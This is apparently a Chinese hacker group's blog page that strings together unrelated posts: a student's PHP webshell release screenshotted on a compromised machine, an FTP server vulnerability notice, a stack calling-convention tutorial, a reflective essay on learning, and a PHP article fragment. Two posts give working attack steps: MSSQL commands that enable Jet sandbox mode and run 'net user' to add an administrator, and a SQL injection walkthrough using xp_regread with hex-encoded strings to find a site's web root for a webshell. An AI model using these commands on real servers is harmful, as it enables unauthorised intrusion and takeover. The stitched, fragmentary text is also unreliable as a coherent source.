CNXCT小组的博客

作者：CFC4N 文章性质： 本站原创 写这个程序时`遇到很多困难` ` 宿舍没联网` 没办法查资料` 到学校的图书馆` 翻遍了`就两本PHP+MYSQL的书“ NND 学校真垃圾“ ASP JSP 的书N 多 为什么没PHP 的??? 哎“ 快考试了,有很多功能没有添加`宿舍也没联网`等下学期来在讲吧““` 编辑的保存功能还没有搞定`但是由于俺上一次网不容易,所以就提前发出来了! 也没什么意思`就是想激励自己吧 “ 写的很垃圾` 大家别骂我哦！！ 以下是截图 由于是在肉鸡上截图的` 所以 掩盖了 一些 肉鸡的信息` 大家见谅!! 源碼修改中““““` 1.編輯功能 2.Apache中出現錯誤 3.亂碼問題,支持UTF-8 4.美化精簡参了Angle的PHPSPY和top&rains的PHPTREE! 代表全国人民感谢他们!! 大家使用的时候，您的服务器支持PHP 才可以！！ 如果提示下载那就说明您的服务器不支持PHP！

郁闷..快两个月没有联网了 .!!!!!快放假了要又准备找工作烦呀!!! 想想明天就要毕业了.准备出去找个.编程的工作也不错..哈哈. 看了.计多 NB们的BLog 心里沉沉得..跟人家的差距太大了.再想想自己什么也不精通.. 嘿..简直就是个垃圾.. 看来下学期来. 要精通一门咯. [sweat] [sweat] [sweat]

受影响版本： Quick Easy FTP Server 3.91或以下版本 漏洞描述： Quick Easy FTP Server 是一个FTP服务器端软件,基本实现了标准FTP服务器所具有的功能软件由服务器配置,用户帐户管理,安全性设置,在线用户信息, 服务器日志, 实时数据统计,检查更新几部分组成.因程序在处理超长命令参数时多个命令存在问题，远程攻击者可利用这些问题以程序运行权限执行任意指令。 厂商补丁： 官方并无任何补丁更新，请各位留意官方通告 Bug.Center.Team临时解决方案 暂时停止使用该服务程序，因程序自身存在过多问题。

SA权限仅需xp_regwrite即可有dos shell 删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell 利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了 绝对比去想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径 nt/2k: x:\winnt\system32\ xp/2003: x:\windows\system32\ 如果有回显，可以看到执行返回结果，否则需要先判断主机OS类型再试 当然如果野蛮一点，四个轮流来一遍也行。 首先开启沙盘模式： exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE”SOFTWARE\Microsoft\Jet\4.0\Engines”SandBoxMode”REG_DWORD’1 然后利用jet.oledb执行系统命令 select * from openrowset(‘microsoft.jet.oledb.4.0”;database=c:\winnt\system32\ias\ias.mdb”select shell(“cmd.exe /c net user admin admin1234 /add”)’) 无法连接数据库服务器时（数据库一般不对外开放，但是可以对外访问）， 可以使用反弹dos shell方式搞定

2006年1月15日09:08星期日 [VC] 在经典的汇编语言教程中，函数调用时堆栈的使用都是着重讲解的问题。如今随着高级语言的越来越完善，单纯使用汇编开发的程序已经不多了。但对函数调用时堆栈动向的了解仍有助于我们明晰程序的执行流程，从而在程序编写和调试的过程中有一个清晰的思路。 一．调用约定 在Win32中，有关函数的调用主要有两种约定。 1．_stdcall 以__stdcall方式调用的函数有以下特征： • 参数由右至左压栈 • 调用返回时，堆栈由被调函数调整 2．__cdecl __cdecl约定是C/C++函数的默认调用约定。它有以下特征： • 参数由右至左压栈 • 调用返回时，堆栈由调用者调整 二．Win32函数调用过程 1. 压入参数 这里依据以上的调用方式将调用者给出的参数一一压入堆栈。 2. 压入断点 当程序执行到Call指令的时候，当前语句的地址作为断点地址压入堆栈。 3. 跳转 eip的值被重新设置为被调函数的起始地址。 4. mov ebp, esp 这里ebp被用来在堆栈中寻找调用者压入的参数，同时作为调用者堆栈指针的一个备份。在此前还应该执行一条： push ebp 把ebp中原来的数值保存。 5. sub esp，N 这里N是函数内局部变量的总字节数加上一个整数，一般为40。此后esp即为被调函数的堆栈指针了。 6. 初始化esp ~ esp-N之间的N字节空间 这是对堆栈中已分配给局部变量使用的内存空间的初始化，一般全部设置为0xcc。 7. 顺序执行函数内语句。 此时函数的堆栈位于所有局部变量的内存空间之后，二者之间一般有40字节的隔离带。 8．返回 为保障调用的正常返回，函数内应当保证规范使用堆栈，使即将返回的时候esp的值恢复为执行第一条语句前的状态。说明白点，就是每一条push都要有相应的pop。 调用返回的过程如下： mov esp, ebp 执行后，esp恢复为调用者的堆栈指针，栈顶除断点地址外，还存有原ebp的值和调用时压入的参数。 然后依次弹出ebp的值和断点地址。如果是__cdecl约定则直接返回调用者，调用者将负责调整堆栈，丢弃调先前压入的参数。如果是__stdcall则这个工作由被调函数来执行。 [...]

我的目的主要是取得网站的目录,当然了,网站和mssql数据库在一台服务器上，权限DB_owner。 在某官网发现了一个注点，一个’号提示”xxxxxxxxxx’0”出现错误 ” ，经过初步的分析是把单引号，直接转换成了0′,所以如果用工具肯定注入不了，实践证明工具不行，但能检测出来其权限为:DB_owner,手工检测的方法无非是: and 1=(select is_isvrolemember(‘sysadmin’))这是简单检测系统权限。还好只是对单引号有限制，其它符号没有限制。不过这一点确实已经够麻烦的了。 　　 　我们的目的是检测网站目录在什么地方，如果找到的话，直接差异备份数据库，取得webshell。 　　 　　首先提取IIS设置初期,网站目录在注册表中的位置，然后再暴出来。 　　 建一个表xy,;create table xy(xy1 nvarchar(256) null)，然后网表里插入其值，语句如下: ;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’,@result output insert into xy (xy1) values(@result) 由于对’单引号的转换，所以上面的命令肯定成功不了，这时我们可以想到再用declare函数，一开始我的做法为把 ‘HKEY_LOCAL_MACHINE’和’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’和‘/’，这3个数据分别附于3个变量，这样语句构成为: ;DECLARE @a varchar(255) select @a=0x484b45595f4c4f43414c5f4d414348494e45 DECLARE @b varchar(255) select @b=0x53595354454d5c434f4e54524f4c5365743030315c53657276696365735c57335356435c506172616d65746572735c5669727475616c20526f6f7473 DECLARE @c varchar(255) select @c=0x2f DECLARE @result varchar(255) exec master.dbo.xp_regread @a,@b,@c,@result output [...]

自己都觉得这里的水平底的一塌糊涂，当然也包括我自己了，所以我经常也要跑到whnet去问问题，有时候都恨自己怎么这么菜啊。 scz(四哥)说：BBS是不能真正学到东西的，不过这里能开阔人的视野，能得到对大方向的指引，能够了 。 是的，真的是足够了，要不是scz的指引，我不会走这条路的，当时在gznet的BBS上，我也问了好多关于unix network programming的问题，得到好多人的帮助。后来转而学习linux kernel，来到了whnet,主要就是得到scz的帮助，我很感谢他。我想他在教育网内是很成功的，可能带起了一群人。 [color=Blue]自己的成长其实就是生产问题，解决问题的过程。 问题就是在自己不断的学习中产生的，你学习了吗？你努力了吗？你有问题要问吗？ 自己付出了多少，就会有多大的收获，这点我有很大很大的体会。[/color] 转了这么多的技术文章，不是为了增加版面，增加人气，完全是给有心人看的,自己要想学，想看才能学进去，看进去。希望他们能在这里得到进阶。 转了这么多的技术文章，只是希望川大的“黑客”(暂且以黑客称之)不要误入 歧途，不要只做被人们称为的脚本小子，要做就做一个白帽(white-hat). 没人敢说自己是黑客，除非他自己知道他在说什么。所以我也没有用黑客这个词. 我做这里的斑竹的目的不是来一个人撑起一个版的，只是为了上面的几点。 今天又去了linuxforum，颇有感触，如果你也在linux kernel hack(也许你会对hack 这词误会),如果你看过linux的源代码就不会觉得奇怪了)话， 去http://www.linuxforum.net/cgi-bin/perl/postlist.pl?Cat=&Board=linuxK 感受感受真正做学问的气氛吧。 有必要大家来重温一下四哥那篇《你尽力了吗》。 看看真正高手的那份淡然吧 发信人: cloudsky (小四), 信区: Security 标 题: 你尽力了吗 发信站: 武汉白云黄鹤站 (Mon Apr 17 19:52:54 2000), 站内信件 很多人问如何入门如何入门，我却不知道要问的是入什么门。很少把某些好文章耐心从头看完，我这次就深有体会。比如袁哥的sniffer原理，一直以为自己对sniffer原理很清楚的，所以也就不曾仔细看过袁哥的这篇。后来有天晚上和袁哥讨论，如何通过端口读写直接获取mac地址，为什么antisniff可以获得真正的mac地址，而不受更改mac地址技术的影响，如何在linux下获得真正的mac地址。我一直对linux下的端口读写心存疑虑，总觉得在保护模式下的端口都做了内存映象等等。结果袁哥问了我一句，你仔细看我写的文章没有，我楞，最近因为要印刷月刊，我整理以前的很多文档， 被迫认真过滤它们，才发现袁哥的文章让我又有新认识。再后来整理到tt的几篇缓冲区溢出的，尤其是上面的关于Solaris可装载内核模块，那就更觉得惭愧了。 以前说书非借不能读，现在是文章留在硬盘上却不读。其实本版已经很多经典文章了，也推荐了不少经典书籍了，有几个好好看过呢。W.Richard.Stevens的UNP我算是认真看过加了不少旁注，APUE就没有那么认真了，而卷II的一半认真看过，写过读书笔记，卷III就没有看一页。道格拉斯的卷I、卷III是认真看过几遍，卷II就只断续看过。而很多技术文章，如果搞到手了就懒得再看，却不知道这浪费了多少资源，忽略了多少资源。BBS是真正能学到东西的地方吗？rain说不是的，我说也不是的。不过这里能开阔人的视野，能得到对大方向的指引，足够了。我一直都希望大家从这里学到的不是技术本身，而是学习方法和一种不再狂热的淡然。很多技术，明天就会过时，如果你掌握的是学习方法，那你还有下一个机会，如果你掌握的仅仅是这个技术本身，你就没有机会了。其实我对系统安全是真不懂，因为我一直都喜欢看程序写程序却不喜欢也没有能力攻击谁谁的主机/站点。我所能在这里做的是，为大家提供一个方向，一种让你的狂热归于淡然的说教。如果你连、< win9x系统编程>都没有看过，却要写个什么隐藏自己的木马，搞笑。如果你看都不看汇编语言，偏要问exploit code的原理，那我无法回答也不想回答你。总有人责问，要讨个说法纭纭，说什么提问却没有回答。不回答已经是正确的处理方式了，至少没有回你一句，看书去，对不对，至少没有扰乱版面让你生闷气。Unix的man手册你要都看完了， 想不会Unix都不行了。微软的MSDN、Platform SDK DOC你要看完了，你想把Win编程想象得稍微困难点都找不到理由。还是那句话，一个程序员做到W.Richard.Stevens那个份上，做到逝世后还能叫全世界的顶级hacker们专门著文怀念，但生前却不曾著文攻击，想想看，那是一种什么样的境界，那是一份什么样的淡然。我们可以大肆讨论技术问题，可以就技术问题进行激烈的卓有成效的讨论，却无意进行基础知识、资源信息的版面重复。我刚在前面贴了一堆isbase的文章，开头就是主页标识，却在后面立刻问什么主页在哪里？前面刚刚讨论过如何修改mac地址，后面马上又来一个，前后 相差不过3篇文章。选择沉默已经是很多朋友忍耐力的优异表现了。很多东西都是可以举一反三的。vertex的lids，被packetstorm天天追踪更新，你要是看了THC的那三篇，觉得理解一个就理解了一堆，都是内核模块上的手脚。 [color=Blue]你不看你怎么知道。 我不想在这里陷入具体技术问题的讨论中去，你要是觉得该做点什么了，就自己去看自己去找。 没有什么人摆什么架子，也没有什么人生来就是干这个的。 你自己问自己，尽力了吗？[/color]

HP作为一种服务器端的脚本语言，象编写简单，或者是复杂的动态网页这样的任务，它完全能够胜任。但事情不总是如此，有时为了实现某个功能，必须借助于操作系统的外部程序（或者称之为命令），这样可以做到事半功倍。
　　那么，是否可以在PHP脚本中调用外部命令呢？如果能，如何去做呢？有些什么方面的顾虑呢？相信你看了本文后，肯定能够回答这些问题了。

　　是否可以？
　　答案是肯定的。PHP和其它的程序设计语言一样，完全可以在程序内调用外部命令，并且是很简单的：只要用一个或几个函数即可。